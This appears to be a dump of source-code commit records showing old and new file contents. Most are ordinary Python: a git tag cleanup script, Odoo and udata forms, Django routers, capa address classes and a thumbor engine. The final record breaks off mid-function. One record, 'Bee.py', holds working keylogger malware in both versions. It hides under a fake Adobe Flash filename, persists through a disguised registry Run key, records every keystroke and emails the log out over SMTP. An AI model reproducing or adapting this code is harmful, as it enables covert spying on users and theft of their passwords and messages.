versions = sorted(list(set([tag_to_version(tag) for tag in tags])),
                  key=semver.parse_version_info)
# Everything except the last three versions is up for deletion.
versions_to_delete = versions[:-3]
cmd_delete_local = 'git tag --delete'
cmd_delete_remote = 'git push --delete '
# With a token, push over an authenticated HTTPS URL (CI); otherwise use
# the default 'origin' remote.
GITHUB_TOKEN = os.environ.get('GITHUB_TOKEN')
if GITHUB_TOKEN:
    cmd_delete_remote += (
        'https://{}@github.com/autozimu/LanguageClient-neovim.git'
        .format(GITHUB_TOKEN))
else:
    cmd_delete_remote += 'origin'
for tag in tags:
    if tag_to_version(tag) in versions_to_delete:
        cmd_delete_local += ' ' + tag
        cmd_delete_remote += ' ' + tag
# Only run the commands if at least one tag was appended to them.
if not cmd_delete_local.endswith('delete'):
    subprocess.check_call(cmd_delete_local, shell=True)
if not (cmd_delete_remote.endswith('origin') or
        cmd_delete_remote.endswith('.git')):
    subprocess.check_call(cmd_delete_remote, shell=True)
| #!/usr/bin/env python3
import os
import subprocess
import re
import semver
def tag_to_version(tag):
    """Extract the version from a tag shaped like 'binary-<version>-<target>'.

    e.g. 'binary-0.2.0-x86_64-unknown-linux-musl' -> '0.2.0'
    """
    version = re.sub(r'binary-', '', tag)
    # BUG FIX: the original pattern used a character class `[x86|i686]`,
    # which matches any single one of the characters x/8/6/|/i rather than
    # the two literal alternatives; use a non-capturing group instead.
    version = re.sub(r'-(?:x86|i686).*', '', version)
    return version
# Keep only the three newest binary-release tag versions; delete the rest
# both locally and on the remote.
subprocess.check_call('git pull --tags', shell=True)
tags = subprocess.check_output(
    'git tag --list | grep binary', shell=True).decode('UTF-8').splitlines()
# Unique versions, sorted oldest-to-newest by semantic version.
versions = sorted(list(set([tag_to_version(tag) for tag in tags])),
                  key=semver.parse_version_info)
# Everything except the last three versions is up for deletion.
versions_to_delete = versions[:-3]
cmd_delete_local = 'git tag --delete'
cmd_delete_remote = 'git push --delete '
# With a token, push over an authenticated HTTPS URL (CI); otherwise use
# the default 'origin' remote.
GITHUB_TOKEN = os.environ.get('GITHUB_TOKEN')
if GITHUB_TOKEN:
    cmd_delete_remote += (
        'https://{}@github.com/autozimu/LanguageClient-neovim.git'
        .format(GITHUB_TOKEN))
else:
    cmd_delete_remote += 'origin'
for tag in tags:
    if tag_to_version(tag) in versions_to_delete:
        cmd_delete_local += ' ' + tag
        cmd_delete_remote += ' ' + tag
# Only run the commands if at least one tag was appended to them.
if not cmd_delete_local.endswith('delete'):
    subprocess.check_call(cmd_delete_local, shell=True)
if not (cmd_delete_remote.endswith('origin') or
        cmd_delete_remote.endswith('.git')):
    subprocess.check_call(cmd_delete_remote, shell=True)
| Python | 0.000001 |
94aed149fd39ba9a6dd6fcf5dcc44c6e4f2a09b9 | fix imports | website_sale_search_clear/controllers.py | website_sale_search_clear/controllers.py | # -*- coding: utf-8 -*-
from odoo import http
from odoo.addons.website_sale.controllers.main import WebsiteSale as controller
class WebsiteSale(controller):
    """Shop controller override: a text search clears any category filter."""

    @http.route()
    def shop(self, page=0, category=None, search='', **post):
        # When both a search term and a category are supplied, drop the
        # category so the search runs over the whole catalogue.
        if search and category:
            category = None
        return super(WebsiteSale, self).shop(page, category, search, **post)
| # -*- coding: utf-8 -*-
from openerp import http
from openerp.addons.website_sale.controllers.main import website_sale as controller
class WebsiteSale(controller):
    """Shop controller override: a text search clears any category filter."""
    @http.route()
    def shop(self, page=0, category=None, search='', **post):
        # search takes precedence: drop the category so the query is site-wide
        if category and search:
            category = None
        return super(WebsiteSale, self).shop(page, category, search, **post)
| Python | 0.000004 |
24a1bb4fed640a61caa1613cfe4da29a530a8efc | Fix enconding issue on Harvest Config validation | udata/harvest/forms.py | udata/harvest/forms.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from udata.forms import Form, fields, validators
from udata.i18n import lazy_gettext as _
from .actions import list_backends
from .models import VALIDATION_STATES, VALIDATION_REFUSED
__all__ = 'HarvestSourceForm', 'HarvestSourceValidationForm'
class HarvestConfigField(fields.DictField):
    '''
    A DictField with extra validation for known configuration entries
    (backend-specific filters and feature toggles).
    '''
    def get_backend(self, form):
        '''Return the backend instance selected on the parent form.'''
        return next(b for b in list_backends() if b.name == form.backend.data)

    def get_filter_specs(self, backend, key):
        '''Return the backend filter specification for `key`, or None.'''
        candidates = (f for f in backend.filters if f.key == key)
        return next(candidates, None)

    def get_feature_specs(self, backend, key):
        '''Return the backend feature specification for `key`, or None.'''
        candidates = (f for f in backend.features if f.key == key)
        return next(candidates, None)

    def pre_validate(self, form):
        '''Validate filters and features against the selected backend.

        Raises validators.ValidationError on the first invalid entry.
        '''
        if self.data:
            backend = self.get_backend(form)
            # Validate filters
            for f in (self.data.get('filters') or []):
                if not ('key' in f and 'value' in f):
                    msg = 'A field should have both key and value properties'
                    raise validators.ValidationError(msg)
                specs = self.get_filter_specs(backend, f['key'])
                if not specs:
                    msg = 'Unknown filter key "{0}" for "{1}" backend'
                    msg = msg.format(f['key'], backend.name)
                    raise validators.ValidationError(msg)
                if isinstance(f['value'], unicode):
                    # Work around a unicode/bytes mismatch: payloads deliver
                    # text values while some specs declare `str` (bytes on
                    # Python 2).  Guarding on `unicode` avoids an
                    # AttributeError for non-string values (ints, bools).
                    f['value'] = f['value'].encode('utf-8')
                if not isinstance(f['value'], specs.type):
                    msg = '"{0}" filter should of type "{1}"'
                    msg = msg.format(specs.key, specs.type.__name__)
                    raise validators.ValidationError(msg)
            # Validate features
            for key, value in (self.data.get('features') or {}).items():
                if not isinstance(value, bool):
                    msg = 'A feature should be a boolean'
                    raise validators.ValidationError(msg)
                if not self.get_feature_specs(backend, key):
                    msg = 'Unknown feature "{0}" for "{1}" backend'
                    msg = msg.format(key, backend.name)
                    raise validators.ValidationError(msg)
class HarvestSourceForm(Form):
    '''Creation/edition form for a harvest source.'''
    name = fields.StringField(_('Name'), [validators.required()])
    description = fields.MarkdownField(
        _('Description'),
        description=_('Some optionnal details about this harvester'))
    url = fields.URLField(_('URL'), [validators.required()])
    # Choices are resolved lazily so newly registered backends show up.
    backend = fields.SelectField(_('Backend'), choices=lambda: [
        (b.name, b.display_name) for b in list_backends()
    ])
    owner = fields.CurrentUserField()
    organization = fields.PublishAsField(_('Publish as'))
    # Free-form backend configuration, validated by HarvestConfigField.
    config = HarvestConfigField()
class HarvestSourceValidationForm(Form):
    '''Form used to accept or refuse a pending harvest source.'''
    state = fields.SelectField(choices=VALIDATION_STATES.items())
    # A comment is mandatory when the source is refused.
    comment = fields.StringField(_('Comment'),
                                 [validators.RequiredIfVal('state',
                                                           VALIDATION_REFUSED
                                                           )])
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from udata.forms import Form, fields, validators
from udata.i18n import lazy_gettext as _
from .actions import list_backends
from .models import VALIDATION_STATES, VALIDATION_REFUSED
__all__ = 'HarvestSourceForm', 'HarvestSourceValidationForm'
class HarvestConfigField(fields.DictField):
    '''
    A DictField with extra validation on known configurations
    (backend-specific filters and feature toggles).
    '''
    def get_backend(self, form):
        # Backend whose name matches the form's selected backend.
        return next(b for b in list_backends() if b.name == form.backend.data)
    def get_filter_specs(self, backend, key):
        '''Return the backend filter specification for `key`, or None.'''
        candidates = (f for f in backend.filters if f.key == key)
        return next(candidates, None)
    def get_feature_specs(self, backend, key):
        '''Return the backend feature specification for `key`, or None.'''
        candidates = (f for f in backend.features if f.key == key)
        return next(candidates, None)
    def pre_validate(self, form):
        '''Validate filters and features against the selected backend.

        Raises validators.ValidationError on the first invalid entry.
        '''
        if self.data:
            backend = self.get_backend(form)
            # Validate filters
            for f in (self.data.get('filters') or []):
                if not ('key' in f and 'value' in f):
                    msg = 'A field should have both key and value properties'
                    raise validators.ValidationError(msg)
                specs = self.get_filter_specs(backend, f['key'])
                if not specs:
                    msg = 'Unknown filter key "{0}" for "{1}" backend'
                    msg = msg.format(f['key'], backend.name)
                    raise validators.ValidationError(msg)
                # The filter value must match the type declared by the spec.
                if not isinstance(f['value'], specs.type):
                    msg = '"{0}" filter should of type "{1}"'
                    msg = msg.format(specs.key, specs.type.__name__)
                    raise validators.ValidationError(msg)
            # Validate features
            for key, value in (self.data.get('features') or {}).items():
                if not isinstance(value, bool):
                    msg = 'A feature should be a boolean'
                    raise validators.ValidationError(msg)
                if not self.get_feature_specs(backend, key):
                    msg = 'Unknown feature "{0}" for "{1}" backend'
                    msg = msg.format(key, backend.name)
                    raise validators.ValidationError(msg)
class HarvestSourceForm(Form):
    '''Creation/edition form for a harvest source.'''
    name = fields.StringField(_('Name'), [validators.required()])
    description = fields.MarkdownField(
        _('Description'),
        description=_('Some optionnal details about this harvester'))
    url = fields.URLField(_('URL'), [validators.required()])
    # Choices are resolved lazily so newly registered backends show up.
    backend = fields.SelectField(_('Backend'), choices=lambda: [
        (b.name, b.display_name) for b in list_backends()
    ])
    owner = fields.CurrentUserField()
    organization = fields.PublishAsField(_('Publish as'))
    # Free-form backend configuration, validated by HarvestConfigField.
    config = HarvestConfigField()
class HarvestSourceValidationForm(Form):
    '''Form used to accept or refuse a pending harvest source.'''
    state = fields.SelectField(choices=VALIDATION_STATES.items())
    # A comment is mandatory when the source is refused.
    comment = fields.StringField(_('Comment'),
                                 [validators.RequiredIfVal('state',
                                                           VALIDATION_REFUSED
                                                           )])
| Python | 0 |
683ccc69c51a64146dda838ad01674ca3b95fccd | Remove useless hearing comments router | democracy/urls_v1.py | democracy/urls_v1.py | from django.conf.urls import include, url
from rest_framework_nested import routers
from democracy.views import (
CommentViewSet, ContactPersonViewSet, HearingViewSet, ImageViewSet, LabelViewSet, ProjectViewSet,
RootSectionViewSet, SectionCommentViewSet, SectionViewSet, UserDataViewSet, FileViewSet, ServeFileView
)
router = routers.DefaultRouter()
router.register(r'hearing', HearingViewSet, base_name='hearing')
router.register(r'users', UserDataViewSet, base_name='users')
router.register(r'comment', CommentViewSet, base_name='comment')
router.register(r'image', ImageViewSet, base_name='image')
router.register(r'section', RootSectionViewSet, base_name='section')
router.register(r'label', LabelViewSet, base_name='label')
router.register(r'contact_person', ContactPersonViewSet, base_name='contact_person')
router.register(r'project', ProjectViewSet, base_name='project')
router.register(r'file', FileViewSet, base_name='file')
hearing_child_router = routers.NestedSimpleRouter(router, r'hearing', lookup='hearing')
hearing_child_router.register(r'sections', SectionViewSet, base_name='sections')
section_comments_router = routers.NestedSimpleRouter(hearing_child_router, r'sections', lookup='comment_parent')
section_comments_router.register(r'comments', SectionCommentViewSet, base_name='comments')
urlpatterns = [
url(r'^', include(router.urls, namespace='v1')),
url(r'^', include(hearing_child_router.urls, namespace='v1')),
url(r'^', include(section_comments_router.urls, namespace='v1')),
url(r'^download/(?P<filetype>sectionfile|sectionimage)/(?P<pk>\d+)/$', ServeFileView.as_view(), name='serve_file'),
]
| from django.conf.urls import include, url
from rest_framework_nested import routers
from democracy.views import (
CommentViewSet, ContactPersonViewSet, HearingViewSet, ImageViewSet, LabelViewSet, ProjectViewSet,
RootSectionViewSet, SectionCommentViewSet, SectionViewSet, UserDataViewSet, FileViewSet, ServeFileView
)
router = routers.DefaultRouter()
router.register(r'hearing', HearingViewSet, base_name='hearing')
router.register(r'users', UserDataViewSet, base_name='users')
router.register(r'comment', CommentViewSet, base_name='comment')
router.register(r'image', ImageViewSet, base_name='image')
router.register(r'section', RootSectionViewSet, base_name='section')
router.register(r'label', LabelViewSet, base_name='label')
router.register(r'contact_person', ContactPersonViewSet, base_name='contact_person')
router.register(r'project', ProjectViewSet, base_name='project')
router.register(r'file', FileViewSet, base_name='file')
hearing_comments_router = routers.NestedSimpleRouter(router, r'hearing', lookup='comment_parent')
hearing_child_router = routers.NestedSimpleRouter(router, r'hearing', lookup='hearing')
hearing_child_router.register(r'sections', SectionViewSet, base_name='sections')
section_comments_router = routers.NestedSimpleRouter(hearing_child_router, r'sections', lookup='comment_parent')
section_comments_router.register(r'comments', SectionCommentViewSet, base_name='comments')
urlpatterns = [
url(r'^', include(router.urls, namespace='v1')),
url(r'^', include(hearing_comments_router.urls, namespace='v1')),
url(r'^', include(hearing_child_router.urls, namespace='v1')),
url(r'^', include(section_comments_router.urls, namespace='v1')),
url(r'^download/(?P<filetype>sectionfile|sectionimage)/(?P<pk>\d+)/$', ServeFileView.as_view(), name='serve_file'),
]
| Python | 0 |
ad153499a3982182533033acfa17971a35d7a587 | implement __eq__ | capa/features/address.py | capa/features/address.py | import abc
from dncil.clr.token import Token
class Address(abc.ABC):
    """Abstract base for all feature address types.

    Concrete addresses must be comparable, orderable, hashable, and have a
    useful repr so they can be deduplicated, sorted, and debugged.
    """
    @abc.abstractmethod
    def __eq__(self, other):
        # implement == so that addresses can be compared and deduplicated
        ...
    @abc.abstractmethod
    def __lt__(self, other):
        # implement < so that addresses can be sorted from low to high
        ...
    @abc.abstractmethod
    def __hash__(self):
        # implement hash so that addresses can be used in sets and dicts
        ...
    @abc.abstractmethod
    def __repr__(self):
        # implement repr to help during debugging
        ...
class AbsoluteVirtualAddress(int, Address):
    """an absolute memory address"""
    def __new__(cls, v):
        # absolute addresses are never negative
        assert v >= 0
        return super().__new__(cls, v)
    def __repr__(self):
        return "absolute(0x%x)" % int(self)
class RelativeVirtualAddress(int, Address):
    """a memory address relative to a base address"""
    def __repr__(self):
        return "relative(0x%x)" % int(self)
class FileOffsetAddress(int, Address):
    """an address relative to the start of a file"""
    def __new__(cls, v):
        # file offsets are never negative
        assert v >= 0
        return super().__new__(cls, v)
    def __repr__(self):
        return "file(0x%x)" % int(self)
class DNTokenAddress(Address):
    """a .NET token"""
    def __init__(self, token: Token):
        self.token = token
    def __eq__(self, other):
        # NOTE(review): assumes `other` also wraps a token; comparing against
        # a non-token address would raise AttributeError — confirm call sites.
        return self.token.value == other.token.value
    def __lt__(self, other):
        return self.token.value < other.token.value
    def __hash__(self):
        # hash only the numeric token value, consistent with __eq__
        return hash(self.token.value)
    def __repr__(self):
        return f"token(0x{self.token.value:x})"
class DNTokenOffsetAddress(Address):
    """an offset into an object specified by a .NET token"""
    def __init__(self, token: Token, offset: int):
        # negative offsets are programming errors
        assert offset >= 0
        self.token = token
        self.offset = offset
    def __eq__(self, other):
        # NOTE(review): assumes `other` also exposes token/offset — a
        # non-token address would raise AttributeError; confirm call sites.
        return (self.token.value, self.offset) == (other.token.value, other.offset)
    def __lt__(self, other):
        # order by token first, then by offset within the token
        return (self.token.value, self.offset) < (other.token.value, other.offset)
    def __hash__(self):
        return hash((self.token.value, self.offset))
    def __repr__(self):
        return f"token(0x{self.token.value:x})+(0x{self.offset:x})"
class _NoAddress(Address):
    """sentinel for features that have no concrete location"""
    def __eq__(self, other):
        # NO_ADDRESS compares equal to any other address
        return True
    def __lt__(self, other):
        # never less-than anything, so it sorts stably among equals
        return False
    def __hash__(self):
        # constant hash, consistent with __eq__ always returning True
        return hash(0)
    def __repr__(self):
        return "no address"
# shared sentinel instance; use this rather than constructing _NoAddress
NO_ADDRESS = _NoAddress()
| import abc
from dncil.clr.token import Token
class Address(abc.ABC):
    """Abstract base for all feature address types.

    Concrete addresses must be orderable, hashable, and printable.
    """
    @abc.abstractmethod
    def __lt__(self, other):
        # implement < so that addresses can be sorted from low to high
        ...
    @abc.abstractmethod
    def __hash__(self):
        # implement hash so that addresses can be used in sets and dicts
        ...
    @abc.abstractmethod
    def __repr__(self):
        # implement repr to help during debugging
        ...
class AbsoluteVirtualAddress(int, Address):
    """an absolute memory address"""
    def __new__(cls, v):
        # absolute addresses are never negative
        assert v >= 0
        return super().__new__(cls, v)
    def __repr__(self):
        return "absolute(0x%x)" % int(self)
class RelativeVirtualAddress(int, Address):
    """a memory address relative to a base address"""
    def __repr__(self):
        return "relative(0x%x)" % int(self)
class FileOffsetAddress(int, Address):
    """an address relative to the start of a file"""
    def __new__(cls, v):
        # file offsets are never negative
        assert v >= 0
        return super().__new__(cls, v)
    def __repr__(self):
        return "file(0x%x)" % int(self)
class DNTokenAddress(Address):
    """a .NET token"""
    def __init__(self, token: Token):
        self.token = token
    def __lt__(self, other):
        # NOTE(review): assumes `other` also wraps a token; a non-token
        # address would raise AttributeError — confirm call sites.
        return self.token.value < other.token.value
    def __hash__(self):
        # hash only the numeric token value
        return hash(self.token.value)
    def __repr__(self):
        return f"token(0x{self.token.value:x})"
class DNTokenOffsetAddress(Address):
    """an offset into an object specified by a .NET token"""
    def __init__(self, token: Token, offset: int):
        # negative offsets are programming errors
        assert offset >= 0
        self.token = token
        self.offset = offset
    def __lt__(self, other):
        # order by token first, then by offset within the token
        return (self.token.value, self.offset) < (other.token.value, other.offset)
    def __hash__(self):
        return hash((self.token.value, self.offset))
    def __repr__(self):
        return f"token(0x{self.token.value:x})+(0x{self.offset:x})"
class _NoAddress(Address):
    """sentinel for features that have no concrete location"""
    def __lt__(self, other):
        # never less-than anything, so it sorts stably among equals
        return False
    def __hash__(self):
        return hash(0)
    def __repr__(self):
        return "no address"
# shared sentinel instance; use this rather than constructing _NoAddress
NO_ADDRESS = _NoAddress()
| Python | 0.00008 |
e660953c1df2dc9de6b3038e4ddb1d77768b2b51 | Correct pyhande dependencies (broken for some time) | tools/pyhande/setup.py | tools/pyhande/setup.py | from distutils.core import setup
# Packaging metadata for the pyhande analysis package.
# NOTE(review): `install_requires` is a setuptools keyword; plain
# distutils.core.setup emits an "Unknown distribution option" warning and
# ignores it — confirm setuptools provides `setup` here.
setup(
    name='pyhande',
    version='0.1',
    author='HANDE developers',
    packages=('pyhande',),
    license='Modified BSD license',
    description='Analysis framework for HANDE calculations',
    long_description=open('README.rst').read(),
    install_requires=['numpy', 'scipy', 'pandas', 'pyblock', 'matplotlib'],
)
| from distutils.core import setup
# Packaging metadata for the pyhande analysis package (distutils-style
# `requires` metadata with loosely pinned versions).
setup(
    name='pyhande',
    version='0.1',
    author='HANDE developers',
    packages=('pyhande',),
    license='Modified BSD license',
    description='Analysis framework for HANDE calculations',
    long_description=open('README.rst').read(),
    requires=['numpy', 'pandas (>= 0.13)', 'pyblock',],
)
| Python | 0 |
776c8fd802385ef4294112e76365df6bdf93476a | Update Bee.py | Templates/Bee.py | Templates/Bee.py | import pythoncom, pyHook
from os import path
from sys import exit
import threading
import urllib,urllib2
import smtplib
import datetime,time
import win32com.client
import win32event, win32api, winerror
from _winreg import *
import shutil
import sys
mutex = win32event.CreateMutex(None, 1, 'N0tAs519n')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
print "err"
exit(0)
x=''
data=''
count=0
dir = "C:\\Users\\Public\\Libraries\\adobeflashplayer.exe"
def startup():
shutil.copy(sys.argv[0],dir)
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(aKey,"MicrosofUpdate",0, REG_SZ, dir)
if path.isfile(dir) == False:
startup()
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.is_set():
global data
if len(data)>50:
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com"
PORT = 587
USER = EEMAIL
PASS = EPASS
FROM = USER
TO = [USER]
SUBJECT = "B33: "+str(ts)
MESSAGE = data
message = """\
From: %s
To: %s
Subject: %s
%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER,PORT)
server.starttls()
server.login(USER,PASS)
server.sendmail(FROM, TO, message)
data=''
server.quit()
except Exception as e:
print e
self.event.wait(120)
def main():
global x
em4=TimerClass()
em4.start()
return True
if __name__ == '__main__':
main()
def pushing(event):
global x,data
if event.Ascii==13:
e4Ch=' [ENTER] '
elif event.Ascii==8:
e4Ch=' [BACKSPACE] '
elif (event.Ascii == 162 or event.Ascii == 163):
e4Ch = ' [CTRL] '
elif (event.Ascii == 164 or event.Ascii == 165):
e4Ch = ' [ALT] '
elif (event.Ascii == 160 or event.Ascii == 161):
e4Ch = ' [SHIFT] '
elif (event.Ascii == 46):
e4Ch = ' [DELETE] '
elif (event.Ascii == 32):
e4Ch = ' [SPACE] '
elif (event.Ascii == 27):
e4Ch = ' [ESC] '
elif (event.Ascii == 9):
e4Ch = ' [TAB] '
elif (event.Ascii == 20):
e4Ch = ' [CAPSLOCK] '
elif (event.Ascii == 38):
e4Ch = ' [UP] '
elif (event.Ascii == 40):
e4Ch = ' [DOWN] '
elif (event.Ascii == 37):
e4Ch = ' [LEFT] '
elif (event.Ascii == 39):
e4Ch = ' [RIGHT] '
elif (event.Ascii == 91):
e4Ch = ' [SUPER] '
else:
e4Ch=chr(event.Ascii)
data=data+e4Ch
obj = pyHook.HookManager()
obj.KeyDown = pushing
obj.HookKeyboard()
pythoncom.PumpMessages()
| import pythoncom
import pyHook
from os import path
from sys import exit
from sys import argv
from shutil import copy
import threading
import urllib,urllib2
import smtplib
import datetime,time
import win32com.client
import win32event, win32api, winerror
from _winreg import *
mutex = win32event.CreateMutex(None, 1, 'N0tAs519ns')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
print "err"
exit(0)
x=''
data=''
count=0
dir = "C:\\Users\\Public\\Libraries\\adobeflashplayer.exe"
def startup():
copy(argv[0],dir)
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(aKey,"MicrosofUpdate",0, REG_SZ, dir)
if path.isfile(dir) == False:
startup()
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.is_set():
global data
if len(data)>50:
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com"
PORT = 587
USER = EEMAIL
PASS = EPASS
FROM = USER
TO = [USER]
SUBJECT = "B33: "+str(ts)
MESSAGE = data
message = """\
From: %s
To: %s
Subject: %s
%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER,PORT)
server.starttls()
server.login(USER,PASS)
server.sendmail(FROM, TO, message)
data=''
server.quit()
except Exception as e:
print e
self.event.wait(120)
def main():
global x
em4=TimerClass()
em4.start()
return True
if __name__ == '__main__':
main()
def pushing(event):
global x,data
if event.Ascii==13:
e4Ch=' [ENTER] '
elif event.Ascii==8:
e4Ch=' [BACKSPACE] '
elif (event.Ascii == 162 or event.Ascii == 163):
e4Ch = ' [CTRL] '
elif (event.Ascii == 164 or event.Ascii == 165):
e4Ch = ' [ALT] '
elif (event.Ascii == 160 or event.Ascii == 161):
e4Ch = ' [SHIFT] '
elif (event.Ascii == 46):
e4Ch = ' [DELETE] '
elif (event.Ascii == 32):
e4Ch = ' [SPACE] '
elif (event.Ascii == 27):
e4Ch = ' [ESC] '
elif (event.Ascii == 9):
e4Ch = ' [TAB] '
elif (event.Ascii == 20):
e4Ch = ' [CAPSLOCK] '
elif (event.Ascii == 38):
e4Ch = ' [UP] '
elif (event.Ascii == 40):
e4Ch = ' [DOWN] '
elif (event.Ascii == 37):
e4Ch = ' [LEFT] '
elif (event.Ascii == 39):
e4Ch = ' [RIGHT] '
elif (event.Ascii == 91):
e4Ch = ' [SUPER] '
else:
e4Ch=chr(event.Ascii)
data=data+e4Ch
obj = pyHook.HookManager()
obj.KeyDown = pushing
obj.HookKeyboard()
pythoncom.PumpMessages()
| Python | 0.000009 |
d07d87ea7f9d62e8274ba1b958d08756d071653a | add format detection by magic number | thumbor/engines/__init__.py | thumbor/engines/__init__.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/globocom/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com
class BaseEngine(object):
    """Abstract base class for imaging engines.

    Subclasses implement the pixel operations (create_image, crop, resize,
    read, ...); this class holds shared state and the sizing logic.
    """
    def __init__(self, context):
        self.context = context
        self.image = None
        self.extension = None
        self.source_width = None
        self.source_height = None
        self.icc_profile = None
    def load(self, buffer, extension):
        """Load raw bytes; the file header overrides the supplied extension."""
        #magic number detection: trust the header over the caller-supplied
        #extension for the three formats we can recognise cheaply
        if ( buffer[:4] == 'GIF8'):
            extension = '.gif'
        elif ( buffer[:8] == '\x89PNG\r\n\x1a\n'):
            extension = '.png'
        elif ( buffer[:2] == '\xff\xd8'):
            extension = '.jpg'
        self.extension = extension
        self.image = self.create_image(buffer)
        # remember the original dimensions before any resizing happens
        if self.source_width is None:
            self.source_width = self.size[0]
        if self.source_height is None:
            self.source_height = self.size[1]
    @property
    def size(self):
        # (width, height) of the currently loaded image
        return self.image.size
    def normalize(self):
        """Shrink to fit MAX_WIDTH/MAX_HEIGHT; return True if a resize happened."""
        width, height = self.size
        self.source_width = width
        self.source_height = height
        if width > self.context.config.MAX_WIDTH or height > self.context.config.MAX_HEIGHT:
            width_diff = width - self.context.config.MAX_WIDTH
            height_diff = height - self.context.config.MAX_HEIGHT
            # shrink along the dimension that exceeds its limit the most,
            # preserving the aspect ratio
            if self.context.config.MAX_WIDTH and width_diff > height_diff:
                height = self.get_proportional_height(self.context.config.MAX_WIDTH)
                self.resize(self.context.config.MAX_WIDTH, height)
                return True
            elif self.context.config.MAX_HEIGHT and height_diff > width_diff:
                width = self.get_proportional_width(self.context.config.MAX_HEIGHT)
                self.resize(width, self.context.config.MAX_HEIGHT)
                return True
        return False
    def get_proportional_width(self, new_height):
        """Width preserving the aspect ratio at `new_height` (rounded)."""
        width, height = self.size
        return round(float(new_height) * width / height, 0)
    def get_proportional_height(self, new_width):
        """Height preserving the aspect ratio at `new_width` (rounded)."""
        width, height = self.size
        return round(float(new_width) * height / width, 0)
    # The methods below form the engine interface; concrete subclasses must
    # implement them (focus is an optional hook and defaults to a no-op).
    def gen_image(self):
        raise NotImplementedError()
    def create_image(self):
        raise NotImplementedError()
    def crop(self):
        raise NotImplementedError()
    def resize(self):
        raise NotImplementedError()
    def focus(self, points):
        pass
    def flip_horizontally(self):
        raise NotImplementedError()
    def flip_vertically(self):
        raise NotImplementedError()
    def read(self, extension, quality):
        raise NotImplementedError()
    def get_image_data(self):
        raise NotImplementedError()
    def set_image_data(self, data):
        raise NotImplementedError()
    def get_image_mode(self):
        """ Possible return values should be: RGB, RBG, GRB, GBR, BRG, BGR, RGBA, AGBR, ... """
        raise NotImplementedError()
    def paste(self):
        raise NotImplementedError()
| #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/globocom/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com
class BaseEngine(object):
    """Abstract base class for imaging engines.

    Subclasses implement the pixel operations (create_image, crop, resize,
    read, ...); this class holds shared state and the sizing logic.
    """
    def __init__(self, context):
        self.context = context
        self.image = None
        self.extension = None
        self.source_width = None
        self.source_height = None
        self.icc_profile = None
    def load(self, buffer, extension):
        """Load raw bytes using the caller-supplied extension."""
        self.extension = extension
        self.image = self.create_image(buffer)
        # remember the original dimensions before any resizing happens
        if self.source_width is None:
            self.source_width = self.size[0]
        if self.source_height is None:
            self.source_height = self.size[1]
    @property
    def size(self):
        # (width, height) of the currently loaded image
        return self.image.size
    def normalize(self):
        """Shrink to fit MAX_WIDTH/MAX_HEIGHT; return True if a resize happened."""
        width, height = self.size
        self.source_width = width
        self.source_height = height
        if width > self.context.config.MAX_WIDTH or height > self.context.config.MAX_HEIGHT:
            width_diff = width - self.context.config.MAX_WIDTH
            height_diff = height - self.context.config.MAX_HEIGHT
            # shrink along the dimension that exceeds its limit the most,
            # preserving the aspect ratio
            if self.context.config.MAX_WIDTH and width_diff > height_diff:
                height = self.get_proportional_height(self.context.config.MAX_WIDTH)
                self.resize(self.context.config.MAX_WIDTH, height)
                return True
            elif self.context.config.MAX_HEIGHT and height_diff > width_diff:
                width = self.get_proportional_width(self.context.config.MAX_HEIGHT)
                self.resize(width, self.context.config.MAX_HEIGHT)
                return True
        return False
    def get_proportional_width(self, new_height):
        """Width preserving the aspect ratio at `new_height` (rounded)."""
        width, height = self.size
        return round(float(new_height) * width / height, 0)
    def get_proportional_height(self, new_width):
        """Height preserving the aspect ratio at `new_width` (rounded)."""
        width, height = self.size
        return round(float(new_width) * height / width, 0)
    # The methods below form the engine interface; concrete subclasses must
    # implement them (focus is an optional hook and defaults to a no-op).
    def gen_image(self):
        raise NotImplementedError()
    def create_image(self):
        raise NotImplementedError()
    def crop(self):
        raise NotImplementedError()
    def resize(self):
        raise NotImplementedError()
    def focus(self, points):
        pass
    def flip_horizontally(self):
        raise NotImplementedError()
    def flip_vertically(self):
        raise NotImplementedError()
    def read(self, extension, quality):
        raise NotImplementedError()
    def get_image_data(self):
        raise NotImplementedError()
    def set_image_data(self, data):
        raise NotImplementedError()
    def get_image_mode(self):
        """ Possible return values should be: RGB, RBG, GRB, GBR, BRG, BGR, RGBA, AGBR, ... """
        raise NotImplementedError()
    def paste(self):
        raise NotImplementedError()
| Python | 0.000001 |
b277ca357728010c9d763c95cc459540821802c0 | Update dice loss | dataset/models/tf/losses/__init__.py | dataset/models/tf/losses/__init__.py | """ Contains custom losses """
import tensorflow as tf
from ..layers import flatten
def dice(targets, predictions, weights=1.0, label_smoothing=0, scope=None,
loss_collection=tf.GraphKeys.LOSSES, reduction=tf.losses.Reduction.SUM_BY_NONZERO_WEIGHTS):
""" Dice coefficient
Parameters
----------
targets : tf.Tensor
tensor with target values
predictions : tf.Tensor
tensor with predicted logits
Returns
-------
Tensor of the same type as targets.
If reduction is NONE, this has the same shape as targets; otherwise, it is scalar.
"""
e = 1e-6
predictions = tf.sigmoid(predictions)
axis = tuple(range(1, targets.shape.ndims))
